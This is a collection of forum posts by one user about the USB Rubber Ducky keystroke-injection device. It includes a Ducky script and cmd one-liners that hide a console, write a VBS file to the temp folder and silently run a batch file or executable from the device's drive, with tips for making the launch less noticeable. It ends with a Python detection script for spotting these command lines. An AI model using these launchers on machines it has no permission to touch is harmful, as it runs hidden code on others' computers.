White Light
Posts posted by White Light
-
Many stores sell them where I live, especially those meant to be for birthdays or special occasions. Often they have a gift box logo on them so they appear even more like a present you'd give to a kid making their first online purchases.
-
The ducky is just a keyboard, the interaction can only go one-way. There is no way to detect version number automatically with it.
-
Keep in mind, the ducky is only a programmable keyboard. What keystrokes work on one OS, such as Windows 7, might not necessarily do the same function on another, such as Windows 10. This is why I don't use generators, so I can write my own that I know will work on whichever OS (or multiple) I choose.
-
The ducky can do only what you can do with a keyboard on your own, it just allows you to automate the process. If you can download something over SFTP using just your keyboard, then you can do it with a ducky.
-
The issue may very well just be that the script is incorrect. Remember: The ducky is simply a programmable keyboard - it will do what you tell it to do, when you tell it to do it, and nothing else. Try to duplicate exactly what your script is telling the ducky to do, and focus on things that may require extra delays.
-
Hey Adam (funny seeing you here, eh?). You should make it so that it will be able to detect which drive letter the SD/ducky is on so you don't have to manually select it. In my auto-build script, I just check for the drive label (which I know, because I use it in the ducky code).
-
I have the SD reader and my flash drive "goodie bag" attached to a bent paper clip that I use to pop open the ducky case.
-
(Might be best to be patient with replies. This is a pretty quiet board.)
I've noticed that a longer initial delay helps with the driver issue. Usually about 4s does the trick, though it depends on the speed of the computer. It seems to me that if it tries to type while the drivers are still installing, it just skips it and will keep typing the rest of your script until that happens. Other than that, why not just plug it in again after the driver has installed?
-
Here's the VBS code I've been working on, along with the modified CMD string.
REM DEFAULT_DELAY 20
DELAY 2000
GUI r
DELAY 100
STRING cmd /T:01 /K mode con cols=15 lines=1&copy /y con %tmp%\z.vbs
ENTER
DELAY 300
STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d=""
ENTER
STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name
ENTER
STRING if d="" then wscript.sleep 500
ENTER
STRING loop
ENTER
STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false
ENTER
DELAY 10
CTRL z
ENTER
DELAY 50
STRING start "" %tmp%\z.vbs&exit
ENTER
Weird, it didn't include everything I typed after the code. I really can't be bothered to type out all that again, but I'll summarize.
Some CMD switches do little or nothing at all. I've included only the ones necessary.
Making the window smaller using mode instead of moving it is probably less noticeable. Moving to the left is better than down, as the window generally spawns in the upper-left side of the screen.
VBS code runs silent, loops until it finds the drive named "DUCKY".
90% certain VBS code will work on all XP versions and above. If it won't work on something, it'll be XP Home.
-
If you look, it actually only uses diskpart on XP (as XP home doesn't have access to the WMI console). Everything else is all just done in one command. If you were to run CMD and have the above run via the command line directly, the box would be visible only for the amount of time necessary to either query diskpart or WMIC (a few seconds at most).
Ducks only seem to mount the FS slowly the first time they are plugged into a computer, making testing timings difficult. I've got a work-in-progress using VBS to loop in the background waiting for the drive to load, which means that timing wouldn't ever be an issue. In the meantime, I would suggest that instead of using
cmd /Q /D /T:7F /F:OFF /V:ON /K
you could try changing the colour setting to something with two dark settings, like 01 (if my memory serves that's dark blue on black background). You could also try reducing the console size to the bare minimum (1 line and somewhere between 10-18 columns, I can never remember).
cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1
Please forgive any mistakes. I'm on mobile right now, so I can't exactly test the syntax of the mode command.
-
Personally, I would do something like this, to avoid having to loop through each drive letter:
for /f "tokens=3" %v in ('ver') do if %v==XP (for /f "tokens=3" %a in ('echo list volume ^| diskpart ^| find "Volume" ^| find "RUN"') do start "" %a:\run.exe) else (for /f %a in ('wmic logicaldisk get volumename^,name ^| find "RUN"') do start "" %a\run.exe)
Works on Windows XP using diskpart as well as Vista+ using wmic.
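Seen from the defender's side, the command strings quoted in the posts above (the cmd/mode/copy con line and the volume-label lookup via diskpart or wmic) leave recognisable process-creation command lines. The following is an added example, not part of any original post: it assumes command-line logging is available, and the rule names, size thresholds and sample records are constructed for illustration.

```python
import re

# Indicators taken from the command strings quoted in the posts above.
RULES = {
    # console shrunk to a sliver: "mode con cols=15 lines=1"
    "tiny_console": re.compile(r"\bmode\s+con\b.*?\bcols=(\d+)\s+lines=(\d+)", re.I),
    # script typed into the console and saved: "copy /y con %tmp%\z.vbs"
    "copy_con_script": re.compile(
        r"\bcopy\s+(?:/y\s+)?con\s+\S+\.(?:vbs|js|bat|cmd|ps1)\b", re.I),
    # removable drive located by label: wmic volumename / "list volume | diskpart"
    "label_lookup": re.compile(
        r"wmic\s+logicaldisk\s+get\s+[^|&]*volumename"
        r"|list\s+volume[\s^]*\|[\s^]*diskpart", re.I),
}
MAX_COLS, MAX_LINES = 20, 2  # assumed thresholds for "tiny"; tune per environment


def score(cmdline):
    """Return the names of the rules a single command line matches."""
    hits = []
    for name, rx in RULES.items():
        m = rx.search(cmdline)
        if not m:
            continue
        if name == "tiny_console" and not (
                int(m.group(1)) <= MAX_COLS or int(m.group(2)) <= MAX_LINES):
            continue  # ordinary resize such as cols=120 lines=40
        hits.append(name)
    return hits


def triage(events):
    """Map event index -> matched rules, skipping events with no hits."""
    return {i: h for i, cmd in enumerate(events) if (h := score(cmd))}


# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r"cmd /T:01 /K mode con cols=15 lines=1&copy /y con %tmp%\z.vbs",
    r"cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1",
    r'cmd /c wmic logicaldisk get volumename,name | find "RUN"',
    r'cmd /c echo list volume | diskpart | find "Volume" | find "RUN"',
    r"cmd /c mode con cols=120 lines=40",
    r"cmd /c copy /y report.txt D:\backup\report.txt",
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, rules, SAMPLE_EVENTS[idx])
```
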
-
are there Windows 10 payload generators?
in Classic USB Rubber Ducky
You can use different firmwares to do different things. One allows you to use the ducky as a keyboard AND a mass storage device. Check the wiki for the links to that.